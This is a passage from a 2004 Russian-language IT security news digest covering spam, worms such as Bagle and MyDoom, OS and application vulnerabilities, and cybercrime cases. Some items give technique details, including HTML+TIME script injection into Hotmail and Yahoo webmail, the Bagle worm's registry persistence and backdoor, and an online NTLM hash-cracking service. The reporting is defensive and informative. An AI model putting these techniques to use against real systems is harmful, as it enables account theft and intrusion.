ICQ-спам пока еще не стал столь же массовым явлением, как спам по e-mail. Тем не менее последнее время о нем говорят все чаще. На первый взгляд, как метод рассылка спама по ICQ «выигрывает» в сравнении с почтовым спамом. В «аське» наличествует возможность очень четкого таргетинга как по географии, так и по полу и возрасту – вся эта информация вносится самим пользователем при регистрации. С другой стороны, подобные сведения часто оказываются недостоверными. А сами спамеры не слишком озабочены вопросом таргетинга – он невыгоден с экономической точки зрения. К тому же, если, по оценкам Yahoo!, из 10 млн пользователей Интернета в России 90% работают с электронной почтой, то, согласно данным КОМКОНа, доля тех, кто использует ICQ, всего 21%. Невелика и стоимость услуги по распространению спама через ICQ. Сейчас на просторах Рунета можно найти предложения от $1 за рассылку 5 тыс. посланий. Во столько же обойдется отправка 10 тыс. писем. Сами спамеры декларируют отклик до 25%. Такая цифра выглядит вполне реально, если учесть, что рассылки, как правило, уходят только тем пользователям, которые находятся в режиме онлайн. При этом, по данным антиспамеров, отклик на e-mail подобного содержания составляет 1-3%. По всей вероятности, сказывается большое количество неиспользуемых адресов и работа спам-фильтров.
Подробнее - http://www.webinform.ru/analyst/877.html

27/03/2004 19:05 "nthost.ru" (Москва) начинает проверять почту на вирусы и спам.
По сообщению компании "nthost.ru" (Москва) 26 марта 2004 г. в тестовом режиме, по всем тарифным планам windows и unix хостинга запущена услуга антивирусной и антиспамерской проверки почтовых сообщений с возможностью индивидуальной настройки. Все желающие клиенты могут активировать использование антиспам фильтров и антивирус в разделе почта панели управления аккаунтом. В тестовый период услуга предоставляется бесплатно. Также произведён ряд дополнительных настроек почтового сервера с целью уменьшения количества получаемого спама и вирусов.
Подробности - http://www.nthost.ru/

27/03/2004 18:26 Стартовал DBL на rejik.ru.
На сайте http://rejik.ru запущен в рабочем режиме DBL - Distributed Ban-List (Распределенный Бан-Лист). Люди, занимающиеся блокированием порнографии, баннеров и прочего барахла, обычно сталкиваются с дилеммой "где же нам взять бан-листы". Причем хочется, чтобы были они большие и правильные. К сожалению, идеал недостижим. Как правило, качество (отсутствие ошибок) бан-листа обратно пропорционально его размеру. Задача DBL - объединить усилия админов с целью получить большие и качественные бан-листы, cообщает linux.org.ru.
Подробности - http://www.rejik.ru/720/index.html

27/03/2004 18:01 Баллмер: Мы прозевали поиск.
Недостаточные инвестиции Microsoft в технологию интернет-поиска были непростительной ошибкой компании, но она работает над тем, чтобы наверстать упущенное, сказал CEO Стив Баллмер. «Говорят, что Microsoft успевает везде, но вот вам пример того, где мы не успели, — заявил Балмер в четверг, выступая перед аудиторией менеджеров по маркетингу и представителей СМИ на пятой ежегодной конференции Microsoft по рекламе в Редмонде. Затем, как энергичный футбольный тренер, воодушевляющий команду на вторую половину матча, Баллмер заверил, что Microsoft все еще в игре и намерена победить. «Вы увидите много красивой борьбы на этой арене», — с уверенностью заявил он, в сердцах бросив на пол указку. Microsoft с трудом протискивается на одну из самых оживленных территорий в вебе. Она упорно старается наверстать упущенное, но пока отстает: большинство результатов веб-поиска компании приносит ее главный конкурент Yahoo. А на этой неделе европейские антимонопольные власти потребовали от Microsoft внести существенные изменения в структуру своего ПО — этот шаг может помешать компании вводить в будущие версии операционной системы Windows новые функции, в том числе и поиск.
Подробности - http://zdnet.com.com/2100-1104_2-5179402.html

27/03/2004 16:57 Начинается бета-тестирование Kaspersky® Security для PDA 5.0 .
Новое поколение уникального средства информационной защиты для КПК входит в финальную стадию разработки. "Лаборатория Касперского" объявляет начало открытого бета-тестирования нового средства обеспечения безопасности, представляющего передовую серию разработок "Лаборатории Касперского" - Kaspersky® Security для PDA 5.0. Kaspersky Security для PDA представляет собой не имеющее аналогов сочетание средств защиты данных, хранимых на карманном переносном компьютере (КПК). Продукт обеспечивает комплексную антивирусную защиту КПК различных типов, работающих под управлением наиболее популярных операционных систем - Windows CE и Palm OS. Помимо этого, программный комплекс предоставляет пользователю возможность контроля доступа к хранимой информации. Антивирусная составляющая системы защиты КПК реализована на базе Антивируса Касперского, оптимизированной для использования в операционных средах Windows CE и Palm OS. Важным свойством пакета программ Kaspersky Security для PDA является функция шифрования данных, защищающая карманный компьютер от несанкционированного доступа к расположенной на нем информации. В среде Windows CE программа позволяет создавать секретные папки, вся информация в которых зашифрована, а доступ ограничен паролями. Для Palm OS данная функция реализована в виде режима блокирования всего КПК, при этом для перевода компьютера в рабочее состояние требуется ввод пароля. Одновременно с блокировкой производится шифрование данных, и поэтому, даже располагая содержимым памяти заблокированного КПК, злоумышленник не сможет извлечь нужную информацию без пароля.
Источник - http://www.kaspersky.ru

27/03/2004 16:33 Борьба с распространением MP3 в LiveJournal.
В последнее время из российского сегмента службы LiveJournal были удалены несколько сообществ, специализирующихся на размещении ссылок на музыкальные файлы в формате MP3. В частности, было удалено одно из самых популярных сообществ такого рода - ru_mp3. Организаторы ряда музыкальных сообществ, обмен ссылками для которых не является основной тематикой, получили от администрации LiveJournal официальные предупреждения, в которых говорилось о том, что размещение ссылок на нелицензионные музыкальные файлы является нарушением правил использования LiveJournal, а также законов США. За комментариями по данному вопросу "Компьюлента" обратилась к администрации LiveJournal, а также к организаторам сообщества clubmusic, которые также получили предупреждение о необходимости удалить все ссылки на нелицензионную музыку. Один из главным вопросов, возникающих при рассмотрении ситуации - это почему сообщества по обмену музыкой долгое время работали, как ни в чем не бывало, а затем стали исчезать одно за другим. По словам члена администрации LiveJournal Анатолия Воробья, все объясняется очень просто. Дело в том, что конфликтная комиссия (Abuse Team) LiveJournal только реагирует на жалобы о нарушении правил. "Какое-то сообщество может нарушать правила ЖЖ и месяц, и год, и два, и ничего не произойдёт, если никто не напишет письмо в Abuse Team и не пожалуется на нарушение правил", - подчеркнул Анатолий Воробей. Что касается одновременного закрытия ряда музыкальных сообществ, то это, по мнению Анатолия Воробья, может объясняться как случайными, так и целенаправленными действиями каких-либо лиц. Подозревать в "стукачестве" на сообщества RIAA или другие подобные организации, особых оснований нет, считает Анатолий Воробей. В свою очередь, создатели сообщества clubmusic Артем (psycholog) и Станислав (BaSStaS) считают, что жалобу в конфликтную комиссию ЖЖ мог отправить какой-нибудь законопослушный американский посетитель сообщества, который мог попасть на его страницу случайно, например, через поисковик.
Подробности - http://net.compulenta.ru/2004/3/26/45971/?ref=right

27/03/2004 15:36 Таиланд выдает США украинского киберпирата.
Власти Таиланда приняли решение об экстрадиции в США жителя украинского города Тернополь Максима Ковальчука, подозреваемого в совершении ряда преступлений в сфере компьютерной безопасности. Общая сумма ущерба от незаконной деятельности Ковальчука оценивается в 3 миллиона долларов, отмечает Associated Press. Обвинения в нарушении авторских прав, торговле контрафактными товарами, отмывании денег и незаконном обладании информацией о чужих банковских картах были выдвинуты против Ковальчука в городе Сан-Хосе еще в 2000 году. 20 мая 2003 года 25-летний украинец был арестован в Бангкоке. По данным следствия, Ковальчук занимался продажей контрафактных копий программного обеспечения Microsoft, Autodesk, Adobe и Macromedia через различные интернет-ресурсы. В случае признания Ковальчука виновным в отмывании денег ему грозит тюремное заключение на срок до 20 лет и штраф в размере 500 тысяч долларов.
Источник - http://www.viruslist.ru

26/03/2004 16:18 Фэйк-сайт газеты "Красная звезда".
Занятная стаья появилась на сайте, который известен своей скандальной известностью www.compromat.ru. Суть статьи сводится к тому, что в ряде воинских частей появились газеты "Красной звезды" со статьёй г-на (специально не раскрываю полный титул - ньюсмейкер) Иванова, являющегося нынешним министром Обороны нынешней полностью разваленной (не без его участия) армиии РФ. Суть этого интервью сводится к якобы необходимости более терпимого отношения к службе сексуальных меньшинств (геев) в этой самой армии. Из этого же номера газеты цитата - "Древние считали, что сильна та армия, в которой воины любят друг друга". Самое интересное тут заключается в том, что такой статьи в газете не было (как она появилась в частях - пусть разбираются доблестные органы контрразведки). Тем не менее в Интернете объявился фейк-сайт газеты "Красная звезда" по адресу www.redstar.su, который при проверке по IP-адресу оказался принадлежащим сети, не имеющей никакого отношения к стране под названием Российская Федерация, поскольку принадлежит сети Global Net Access, LLC, что в городе Атланта (штат Джорджия), США. Ничем иным, как информационной войной со стороны самого "миролюбивого" государства в мире подобный шаг назвать нельзя. Настоящий сайт газеты "Красная Звезда" находится по адресу www.redstar.ru.
Подробности - http://www.compromat.ru/main/ivanovserg/falsh.htm

26/03/2004 15:06 «Телефонный вирус»: очередная мистификация.
В последние дни в русском сегменте интернета поднялась волна слухов о так называемом «телефонном вирусе», якобы способном заражать сотовые телефоны, стирать их IMEI и IMSI, а также данные с SIM-карты пользователя. Загадочное «предупреждение» передается, в основном, посредством почтовых рассылок и содержит следующий текст (с незначительными вариациями, внесенными уже самими пользователями): "Телефонный вирус: Если вам позвонили и на дисплее вашего мобильного телефона высвечивается АСЕ-? , не отвечайте на этот звонок, сразу прекратите (выключайтесь). Если вы ответите на звонок, то ваш телефон будет заражен этим вирусом. Вирус сотрет всю информацию IMEI и IMSI с вашего телефона и с вашей SIM карточки, что сделает ваш телефон неспособным связываться с телефонной сетью. Вам придется покупать новый телефон. Эту информацию подтвердили фирмы Моторола и Нокиа. Уже 3 миллиона мобильных телефонов заражены этим вирусом в США. Эти сведения вы также можете проверить на сайте СNN. Пожалуйста, сообщите эту информацию всем друзьям". Эксперты «Лаборатории Касперского» рекомендуют всем получившим подобное письмо посетить сайты обозначенных в нём компаний - Nokia и Motorola - и попытаться найти там подтверждение приведенной в письме информации. Можно попытаться проделать то же самое и на сайте CNN. На данный момент эта мистификация вызвала лишь рост спамовых писем в ящиках пользователей интернета. Ни одного случая «заражения» сотовых телефонов этим «вирусом» «Лаборатория Касперского» не зафиксировала.
Источник - http://www.kaspersky.ru

26/03/2004 12:28 Предприятия Хабаровска понесли тысячные убытки от вмешательства 23-летнего хакера.
Три предприятия Хабаровска понесли тысячные убытки от вмешательства 23 летнего хакера, проживающего в селе Бычиха Хабаровского края. Несколько месяцев молодой человек пользовался Интернетом за счет других, сообщает корреспондент ИА REGNUM. "Про существование этого хакера я вообще не знал, - говорит директор ООО "Транстур" Александр Кезля. - Некоторое время назад наша фирма заключила с Хабаровской телефонно-телеграфной станцией договор о поставке Интернет услуг. Они нам дали пароли для выхода во "Всемирную паутину". Спустя месяц к нам пришли счета за пользование услугами. Причем среди них были незафиксированные нами выходы в глобальную сеть. Я написал заявление о незаконном использовании неизвестным человеком нашим Интернет-ресурсом. Через несколько месяцев сотрудники милиции нашли злоумышленника". По словам сотрудницы пресс-службы УВД по Хабаровскому краю Галины Орловой, им оказался нигде не работающий Булдыгеров, житель села Бычихи. Против него возбуждено несколько уголовных дел по статьям 183 и 165 УК РФ "Незаконное разглашение коммерческой тайны и причинение ущерба". В результате его противоправной деятельности пострадало три организации ФГУП "Дальавиа", "183 военно–картографическая фабрика" и ООО "Транстур". Как потом рассказал сам подозреваемый следователю, пароли для входа в Интернет предприятий ему обменял неизвестный человек еще летом, на прогулочном теплоходе за бутылку "Мартини".
Источник - http://www.crime-research.ru

26/03/2004 12:12 Семинар по информационной безопасности.
14-15 апреля в Санкт-Петербурге и 26-27 апреля в Москве пройдут двухдневные курсы по информационной безопасности "Практическое применение международного стандарта безопасности информационных систем компании ISO 17799 и анализ рисков информационных систем компаний", сообщает bugtraq.ru. Семинар организован компанией Digital Security, проводит его Илья Медведовский, эксперт по информационной безопасности, один из авторов "Атаки [через|на|из] Internet".
Подробности - http://www.dsec.ru/l_courses/schedule.php

26/03/2004 11:33 Вышел официальный почтовый клиент для Palm OS 6.
Компании PalmSource и Visto Corporation сообщили о выходе почтового клиента для будущих ОС Palm OS Cobalt и Garnet. ПО Mobile Mail 5.0 станет стандартной почтовой программой для Palm-наладонников. К сожалению, Mobile Mail 5.0 нельзя будет купить или скачать и установить самостоятельно на существующие КПК класса Tungsten, не говоря уже о более ранних моделях. Программа будет поставляться предустановленной производителем на новых карманных компьютерах, сконструированных под Palm OS 6. Это первый случай в истории Palm, когда почтовое ПО входит в поставку Palm OS, ранее эти программы поставлялись отдельно. Работа с протоколом IMAP в Mobile Mail 5.0 усовершенствована, так что теперь пользователям доступны до 16 папок на почтовом сервере. Поддерживаются SSL и защищённая идентификация пользователей.
Подробности - http://www.visto.com/news/releases/20040322-MM5.html

26/03/2004 11:17 Появление очередной версии червя Bagle.
"Лаборатория Касперского" предупреждает о появлении в интернете новой версии почтового червя Bagle - I-Worm.Bagle.s. Червь распространяется в качестве вложений в зараженные электронные письма. Письма Bagle.s не содержат ни темы, ни текста. Имя вложения - произвольное, расширение - "exe". Размер файла вложения около 8KB. Червь представляет собой PE EXE-файл. Червь упакован FSG, размер распакованного файла около 37KB. После запуска червь копирует себя в системный каталог Windows с именем "gigabit.exe" и регистрирует данный файл в ключе автозапуска системного реестра: [HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun] "gigabit.exe" = "%system%gigabit.exe". Также создает ключ: [SOFTWAREWindows2004] "gsed", где сохраняет свои переменные. При старте червь запускает игру The Microsoft Hearts Network (mshearts.exe). Червь ищет на диске файлы с определёнными расширениями и рассылает себя по всем найденных в них адресах электронной почты. Для отправки почты червь использует собственный SMTP-сервер. После этого открывает и затем отслеживает порт 4751. Функции "бэкдор" позволяют злоумышленнику осуществлять следующие операции: запуск команд, загрузка файлов.
Более подробно - http://www.viruslist.ru/viruslist.html?id=144869633

26/03/2004 10:50 Румыния готовится к суду над автором Blaster.f.
В Румынии начинается подготовка к судебному процессу по делу 24-летнего Дана Думитру Чиобану, арестованного в прошлом году по обвинению в создании версии "f" интернет-червя Blaster (Worm.Win32.Lovesan.a), сообщает Reuters. Несмотря на то, что Blaster.f никогда не рассматривался в качестве источника серьезной киберугрозы, в случае признания вины Чиобану, ему грозит лишение свободы на срок от 3 до 15 лет. Наказание по румынским меркам может оказаться более чем суровым. Например, срок лишения свободы за изнасилование в Румынии составляет около 7 лет. Вводя жесткие меры против киберпреступников, Румыния намеревается избавиться от репутации страны, которая дает прибежище целым преступным синдикатам, занимающимся онлайновыми правонарушениями. Суд над румынским вирусописателем, еще не начавшись, вновь привлек внимание международных экспертов к проблеме адекватных наказаний за киберпреступления. Особое внимание специалисты обращают на случаи, когда вредоносные программы пытаются квалифицировать как результат работы любопытных подростков. «Если юным программистам интересно, как работает такая программа, им следует полюбопытствовать и насчет юридических последствий таких деяний», - заметила заместитель министра связи Румынии Адриана Тичау. «Игра обернулась преступлением», - прокомментировал грядущий процесс адвокат Чиобану.
Источник - http://www.viruslist.ru

25/03/2004 16:40 Уязвимость в ядре Solaris.
Продолжая свои исследования ОС Solaris, Immunity, Inc. обнаружила уязвимость в ядре популярной коммерческой ОС Solaris, наличие которой позволяет загружать в память модули ядра, не имея полномочий суперпользователя. Последствия подобной уязвимости очевидны. Подробное описание опять представлено в формате PDF.
Подробности - http://www.immunitysec.com/downloads/solaris_kernel_vfs.sxw.pdf

25/03/2004 15:43 Уязвимость в OpenBSD.
Букет уязвимостей пополнился уязвимостью в одной из самых надёжных ОС - OpenBSD. Уязвимость, которая обнаружена Rapid7, Inc., присутствует в демоне обработки протокола ISAKMP и позволяет удалённо вызвать отказ в обслуживании (DoS) из-за выхода за пределы памяти при выполнении операций чтения-записи и исчерпании системных ресурсов. Уязвимость была обнаружена в результате тестирования инструмента, выпускаемого Rapid7 под названием Striker ISAKMP Protocol Test Suite. Разработчики OpenBSD выпустили патчи и обновили репозитарий CVS.
Подробности - http://www.rapid7.com/advisories/R7-0018.html

25/03/2004 15:25 Серьёзная уязвимость в dtlogin.
Dave Aitel из Immunity, Inc. сообщает о серьёзной уязвимости в приложении dtlogin, являющимся частью оконного интерфейса открытых систем (и закрытых тоже) под названием CDE (Common Desktop Environment). Уязвимость присутствует в механизме обработки входных данных при использовании протокола XDMCP (double-free weakness) и позволяет удалённо выполнить произвольный код от имени рута (!). В сообщение пишется, что уязвима ОС Solaris, однако в Linux уязвимости нет. При атаке используется удалённый порт 177/UDP. При этом не советуют обключать dtlogin, поскольку этой программой формируется графическое окно входа в систему. Подробное описание представлено в формате PDF.
Подробности - http://www.immunitysec.com/downloads/dtlogin.sxw.pdf

25/03/2004 14:17 Множественные уязвимости в Ethereal.
Как сообщает Stefan Esser из немецкой e-matters Security, обнаружены многочисленные уязвимости в разборщиках пакетов многих протоколов: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP, UCP. Ethereal представляет собой популярный сниффер с GUI-интерфейсом. Присутствует во многих дистрибутивах Linux. Уязвимость позволяет удалённо либо выполнить произвольный код, вставив оный в прослушиваемый пакет, либо вызвать переполнение буфера с падением снифера. Общее количество уязвимостей поражает - их аж 13. Уязвимы версии 0.8.14 - 0.10.2. Выпущена обновлённая версия пакета - 0.10.3. Эксплоит не будет выпущен авторами в широкое использование.
Подробности - http://security.e-matters.de/advisories/032004.html

25/03/2004 13:55 Онлайновый взломщик NTLM-хэшей.
Некий sarca анонсировал доступность в онлайне сайта, на котором можно расшифровать NTLM-хэш, сформированный ОС Windows NT/2000/XP/2003. Как пишет автор, в настоящий момент он располагает таблицей сформированых хэш-таблиц на 18 ГБ. Как написано на сайте, для декодирования применяется программа Rainbowcrack автора Zhu Shuanglei. Техника, применяемая для декодирования называется - rainbow tables technique. Таблицы представляют собой 30 файлов по 640 МБ каждый. Для расшифровки хэша необходимо ввести NT и LM-хэши и ввести адрес, на который будет выслан расшифрованный пароль.
Сайт - http://sarcaprj.wayreth.eu.org/

25/03/2004 13:29 Статья о сетевых атаках.
На сайте linuxfocus.org опубликована статья, являющаяся отличным переводом, выполненым Иваном Песиным со Львова, посвящённая обзору сетевых атак. Статья была опубликована в специальном выпуске Linux Magazine France, посвященном безопасности. Описывает различные типы внешних атак, которые могут применить злоумышленники в сети. Рассмотрены следующие типы атак: атаки, основанные на IP-фрагментации; подмена адреса источника (IP Spoofing); перехват TCP-сеанса (TCP Session Hijacking); подмена ARP-информации (ARP Spoofing); подмена DNS (DNS Spoofing); атаки на приложения. Рекомендуется к ознакомлению системным администраторам и специалистам по компьютерной безопасности.
Статья - http://www.linuxfocus.org/Russian/March2003/article282.shtml

25/03/2004 13:10 Microsoft представила новую мобильную ОС.
Компания Microsoft представила новую версию операционной системы для мобильных устройств. Новая мобильная ОС, названная Windows Mobile 2003 Second Edition, включает ряд важных нововведений по сравнению с оригинальной системой, выпущенной летом прошлого года. Однако основа системы осталась по большей части прежней - об этом явно свидетельствует старое название с дополнением Second Edition на конце. Среди новых функций второй редакции Windows Mobile 2003 отмечаются поддержка расширенного ряда дисплеев разного типа. Теперь Windows Mobile лучше поддерживает экраны с VGA-разрешением (640 x 480 точек), экраны квадратной формы с разрешениями вроде 240 x 240 или 480 x 480 точек. Все это позволит использовать операционную систему в более широком спектре мобильных устройств самого разного назначения. Кроме поддержки большего числа разрешений, Windows Mobile 2003 SE позволяет динамически переключаться между портретным и альбомным режимом демонстрации изображения на экране. Наконец, в ОС появился режим, позволяющий "растянуть" на полный VGA-экран программы, рассчитанные на дисплеи со "старым" разрешением 320 x 240. Среди других нововведений в Windows Mobile 2003 SE стоит отметить мобильную версию технологии сглаживания шрифтов ClearType, новый вариант стартового меню, в котором демонстрируются значки недавно использованных программ. Среди более серьезных доработок стоит выделить поддержку протокола WPA для безопасного доступа к беспроводным сетям Wi-Fi и автоматическое переформатирование сложных веб-сайтов при открытии их в браузере Pocket Internet Explorer.
Подробности - http://www.microsoft.com/presspass/press/2004/mar04/03-24FutureOpportunitiesPR.asp

25/03/2004 12:34 Как мы сами себе рассылаем спам.
"Зомбированные" вследствие нашей небрежности домашние компьютеры все активнее участвуют в массовых рассылках e-mail - спама. Без ведома своих хоязеев, разумеется. По прогнозам аналитиков, еще до середины нынешнего года доля спама может достичь 70% почтового трафика. Несмотря на техническое противодействие компаний потоку спама и принятие законов против него, положение не улучшается. Спамеры адаптируются, изыскивая новые возможности для почтовых рассылок. Организаторы таковых имеют в отличие от вирусописателей серьезный материальный стимул: то, чем они занимаются, - хотя и подпольный, но все же бизнес. Один из важных ресурсов, задействованных спамерами, - домашние компьютеры, подключенные к Интернету. По сведениям Би-би-си, треть спама рассылается именно с использованием машин, которые установлены у нас дома. С распространением широкополосного доступа к Интернету как массовой услуги эта часть компьютерного парка стала легкой добычей хакеров. Квалифицированно эксплуатировать операционную систему, как это делается в локальных сетях компаний, в домашних условиях мало кто умеет, а благодаря пропускной способности канала передать можно значительные объемы данных. Технология, используемая для "зомбирования" домашних ПК, в точности та же, которая применяется авторами вирусов. Собственно, именно вирус, "почтовый червь", подготавливает домашние ПК к использованию в качестве источника спама. Первым из таких вирусов стал Sobig (январь 2003 года). За ним последовали Sinit, Fizzer и MyDoom. Эпидемия последнего в прошлом месяце стала самой масштабной в истории Интернета. Зараженные машины сами по себе не являются объектом атаки. Наоборот, вирус старается остаться незамеченным. Но инфицированные компьютеры (в случае с MyDoom таковых оказалось сотни тысяч, некоторые эксперты говорили о полумиллионе) образуют сеть, через которую и идет рассылка спама. До появления технологий, в принципе исключающих анонимные рассылки e-mail, выход из положения состоит в том, чтобы отслеживать сетевые адреса захваченных спамерами компьютеров. Публикация таких списков - действенный способ заставить пользователей избавиться от рассылающих спам вирусов (пребывание в списке "заразных" машин автоматически означает отказ почтовых служб от приема любой исходящей корреспонденции, и это серьезный стимул к "лечению"). "Черные списки" используемых спамерами адресов ведутся и сегодня, но негласно. В ближайшей же перспективе неизбежно либо превращение домашнего пользователя в самому себе системного администратора, либо быстрое развитие платных услуг по уходу за программным обеспечением домашних ПК.
Источник - http://www.finiz.ru

25/03/2004 12:09 Microsoft обвинила ЕС в нарушении авторских прав в ответ на рекордный штраф.
Руководство Microsoft заявило о нарушении своих прав на интеллектуальную собственность в связи с решением Антимонопольной комиссии ЕС, которая оштрафовала компанию на 497 миллионов евро, передает агентство Reuters. Как сообщил вице-президент и главный юрист компании Брэд Смит (Brad Smith), Microsoft подаст жалобу в Европейский суд справедливости и потребует отменить штраф до рассмотрения апелляции. При этом Смит заверил, что решение Антимонопольной комиссии ЕС не повлияет на разработку новой операционной системы Microsoft Longhorn. Антимонопольная комиссия ЕС обвинила Microsoft в намеренном ограничении доступа потребителей к аудио-визуальному программному обеспечению других компаний. По решению комиссии, Microsoft должна в течение 90 дней представить версию операционной системы Windows без программы Media Player. Комиссия также обязала компанию в течение 120 дней предоставить своим конкурентам достаточную информацию для того, чтобы выпускаемые ими серверы могли работать под Windows.
Источник - http://lenta.ru

24/03/2004 18:12 Уязвимость почтовых систем Hotmail и Yahoo.
Компания GreyMagic Software из Израиля сообщает об обнаружении уязвимости в известнейших Вэб-ориентированных почтовых системах Hotmail и Yahoo. Наличие уязвимости позволяет сделать довольно много неприятных вещей: похитить конфиденциальные данные (в том числе логин-пароль), просмотреть содержимое почтового ящика, автоматически посылать почтовые сообщения из почтового ящика жертвы, используя уязвимости браузеров получить доступ к файловой системе жертвы, рассылать через почту черве-вирусов, получить полный доступ к контактному листу в адресной книге. Сама природа уязвимости связана с так называемой функцией HTML+TIME (основаны на SMIL), отвечающей за взаимодействие мультимедийных компонентов с тэгами HTML. При помощи технологии TIME (Timed Interactive Multimedia Extensions) можно, например, синхронизировать проигрывание звуковых файлов с прокруткой текстовых блоков и изображений и просматривать такой документ в любом браузере. Однако, как указывается в документе эта технология наиболее широко используется "браузером всех времён и народов" Internet Explorer-ом, дрывость которого уже давно стала непреложной истиной. Непосредственно уязвимость связана с атрибутами элемента <t:set>. Атрибуты "attributeName" и "to" этого элемента позволяют внедрить ЛЮБОЙ HTML-код в документ, в случае равенства первого "innerHTML". Собственно, сам код HTML как раз и внедряется при этом при помощи атрибута "to" (в том числе и скрипты). Для проведения атаки злодею необходимо отправить жертве составленное определенным образом письмо. При прочтении такого сообщения через веб-интерфейс почтовой службы посредством браузера Internet Explorer на компьютере будет выполнен произвольный программный код. Как отмечает GreyMagic, как ни странно, Microsoft (хозяин хотмыла) среагировала в течении 2-х дней после сообщения уязвимости и залатала дыру. Yahoo же никак не прореагировала и до сих пор её Вэб-почта обладает уязвимостью. Также сообщается, что возможно существование уязвимости в других Вэб-ориентированных почтовых системах. По ссылке, опубликованной ниже также содержится демонстрационный код.
Подробности - http://www.greymagic.com/security/advisories/gm005-mc/

24/03/2004 15:25 Novell открыла исходный код iFolder.
Novell представила исходный программный код iFolder, который ляжет в основу следующей корпоративной версии Novell iFolder и других будущих продуктов для коллективной работы. Теперь заказчики смогут легко подогнать iFolder к своим потребностям или добавить в него новые функции, не дожидаясь очередного выпуска продукта Novell. Код будет предложен широкой публике на условиях GNU General Public License (GPL). Novell сохранит авторские права на код, чтобы иметь возможность распространять будущие продукты на базе этого кода по традиционным коммерческим лицензиям Novell. iFolder состоит из 3 программных компонентов: механизма синхронизации и хранилища данных Simias, на котором основан Novell iFolder, адресной книги, которую iFolder использует для обмена информацией об учетных записях, и собственно iFolder, который использует как Simias, так и адресную книгу. iFolder представляет собой простое решение, которое позволяет обращаться к персональным файлам, управлять ими и создавать резервные копии в любое время и из любого места. Пользователи просто сохраняют файлы локально, а iFolder автоматически копирует и синхронизирует их на любые другие указанные машины. Например, находясь в офисе, пользователь сохраняет файл, и тот через iFolder автоматически копируется в его домашний компьютер. На всех машинах, с которыми работает пользователь, хранятся самые последние версии всех файлов.
Источник - http://www.cnews.ru

24/03/2004 15:03 Microsoft перейдёт на новую версию управления патчами.
Количество выпускаемых исправлений и обновлений для продуктов Microsoft увеличивается стремительными темпами. Добавим к этому различные инфрастуктуры наложения заплаток на разные продукты, специальные языковые версии пакетов обновлений и отличия в самих продукта -- получим кошмар системного администратора. Заметим, что на сегодняшний день для управления заплатками существует несколько продуктов и служб: Microsoft Windows Update, Microsoft Baseline Security Analyzer (MBSA), Microsoft Software Update Services (SUS) и Microsoft Systems Management Server (SMS) с SMS SUS Feature Pack. Настало время упорядочить все это хозяйство, поэтому (по слухам) Microsoft собирается к началу 2004 года выпустить унифицированное средство управления исправлениями (patch management). С теоретической точки зрения должна быть сформирована единая архитектура латания всех продуктов, а с практической - новые версии Windows Update, MBSA, SUS и SMS SUS Feature Pack. В первом квартале 2004 предполагается разработать архитектуру и новую версию Windows Update для всех продуктов Microsoft, а во втором - новые версии MBSA, SUS и SMS 2003. К концу 2004 планируется сократить число типов установки заплаток с восьми до двух (Windows Installer-MSI-3.0 и Update.exe), а в начале 2005 появится SMS 2005, Microsoft System Center и новая версия SUS. Появилась первая версия кандидата на выпуск Microsoft Systems Management Server (SMS) 2003 Release Candidate 1 (RC 1), согласованная с Windows Small Business Server (SBS) 2003 и Microsoft Office Real-Time Communications (RTC) Server 2003 (которые тоже достигли уровня RC), а также с почти готовым сервером Microsoft Exchange Server 2003. Согласно рекламе Microsoft: "SMS 2003 обеспечивает поддержку мобильных коммуникаций с переносными ПК и перемещаемыми профилями пользователей, а также тесную интеграцию с компонентами Windows 2000, например Active Directory". Поставки SMS 2003 начнутся в сентябре.
Источник - http://www.itunion.ru/

24/03/2004 14:29 CHU-600: новый сетевой PowerLine USB-адаптер.
Довольно интересная новость о довольно необычном (вернее, не получившим в настоящее время широкого распространение) сетевом устройстве. Компания MAS Elektronik AG начинает поставки в Россию и страны СНГ новой модели Powerline USB-адаптера CHU-600. Это устройство обеспечивает быструю организацию локальной вычислительной сети на основе стандартной электропроводки. Устройство CHU-600 основано на новой телекоммуникационной технологии Power Line Communication (PLS), позволяющей строить ЛВС с использованием электрической проводки 100-230В в пределах комнаты, этажа или здания. Адаптер соответствует спецификации Homeplug Powerline Specification 1.0, обеспечивает скорость передачи данных до 14 Мбит/с и имеет высокую устойчивость к электропомехам. Наличие режима шифрования трафика по DES с 56-битным ключом позволяет предотвращать несанкционированный доступ в существующую сеть, обеспечивая более высокую безопасность, чем беспроводные сети Ethernet. Новинка может работать с большинством современных операционных систем MS Windows 98SE/ME/2000/XP. Встроенная функция Quality of Service (QoS) обеспечивает приоритеты доступа. Наличие световых индикаторов позволяет отслеживать функционирование устройства. Ориентировочная стоимость около 60 уёв.
Подробности - http://www.nestor.minsk.by/sr/news/2004/03/4031602.html

24/03/2004 14:16 Сайт Gnome.org подвергся хакерской атаке.
Команда системных администраторов сайта Gnome.org сообщила о проникновении неизвестных хакеров на сервер, где расположен ресурс, утверждает "Компьюлента". В настоящее время проводится расследование, однако администраторы сайта утверждают, что исходные тексты менеджера рабочего стола для Linux, выложенные на сервере, не пострадали. Подобные хакерские атаки на серверы с исходными кодами открытого программного обеспечения опасны, прежде всего, возможностью внесения злоумышленниками изменений в программный код ПО. В частности, в исходники программ может быть встроен код программ-шпионов или вирусов. Если вовремя не пресечь хакерское вторжение в код ПО, то измененная версия пакета программ может распространиться по сети среди пользователей и появиться на сайтах-зеркалах. На сайте Slashdot отмечают, что хакерская атака может неблагоприятно сказаться на сроке выхода следующей версии менеджера рабочего стола Gnome 2.6, который назначен на сегодня.
Подробности - http://mail.gnome.org/archives/gnome-announce-list/2004-March/msg00113.html

24/03/2004 13:51 Сайт RIAA снова выведен из строя.
В течение пяти дней с 17 по 22 марта в интернете не был доступен официальный сайт Американской ассоциации звукозаписывающих компаний (RIAA). Эта организация известна своим нетерпимым отношением к распространению музыки через интернет. Главной головной болью RIAA являются файлообменные сети, которые она безуспешно пытается преследовать в суде. В начале 2003 года протестующие против действий RIAA хакеры успешно атаковали сайт этой организации чуть ли не еженедельно. Однако со временем RIAA навела порядок в администрировании сайта, и его взломы практически прекратились. Тем не менее, в середине марта сайт, находящийся по адресу www.riaa.com снова вышел из строя. В этот раз, однако, в случившемся винят не просто хакеров, а авторов вируса MyDoom.F - относительно нового варианта червя, вызвавшего мощнейшую эпидемию в январе-феврале нынешнего года. Этот вирус запрограммирован таким образом, чтобы организовывать DoS-атаки на сайты Microsoft и RIAA с 17 по 22 число каждого месяца. И хотя именно в этот временной период сайт Американской ассоциации звукозаписывающих компаний был недоступен, остается неясным, вывела ли его из строя DoS-атака, или администраторы решили отключить серверы на опасный период. В самой RIAA ситуацию с сайтом 